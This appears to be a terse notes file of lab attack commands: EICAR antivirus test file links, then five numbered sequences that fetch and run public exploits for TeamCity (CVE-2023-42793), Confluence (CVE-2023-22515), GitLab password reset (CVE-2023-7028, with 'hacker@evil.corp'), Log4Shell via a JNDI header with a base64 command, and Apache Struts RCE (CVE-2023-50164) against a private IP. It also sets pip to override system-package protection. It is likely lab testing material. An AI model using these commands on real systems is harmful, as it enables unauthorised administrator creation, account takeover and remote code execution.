https://github.com/fire1ce/eicar-standard-antivirus-test-files?ysclid=m9qocklbd1698739165 https://www.eicar.org/download/eicar-com/?wpdmdl=8840&refresh=6805dd06a406e1745214726 https://www.eicar.org/download/eicar-com-2/?wpdmdl=8842&refresh=6805dd086be751745214728 https://www.eicar.org/download/eicar_com-zip/?wpdmdl=8847&refresh=6805dd0a1c3b21745214730 https://www.eicar.org/download/eicar-com-2-2/?wpdmdl=8848&refresh=6805dd0bbd2811745214731 python3 -m pip config set global.break-system-packages true 1) wget https://github.com/Zenmovie/CVE-2023-42793/raw/main/CVE-2023-42793_admin.sh chmod +x CVE-2023-42793_admin.sh ./CVE-2023-42793_admin.sh 10.200.1.10 8000 2) git clone https://github.com/Chocapikk/CVE-2023-22515 cd CVE-2023-22515/ python3 -m pip install -r requirements.txt python3 exploit.py normal http://10.200.1.10:8000 3) wget https://github.com/duy-31/CVE-2023-7028/raw/main/cve-2023-7028.sh chmod +x cve-2023-7028.sh ./cve-2023-7028.sh http://10.200.1.10:8000 user@victim.site hacker@evil.corp 4) curl 10.200.1.10:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/Basic/Command/ Base64/dG91Y2ggL3RtcC9wd25lZAo=}' 5) git clone https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE.git cd CVE-2023-50164-Apache-Struts-RCE/ python3 -m pip install requests requests_toolbelt cd exploit/ python3 exploit.py --url http://10.200.1.10:8080/upload-1.0.0/upload.action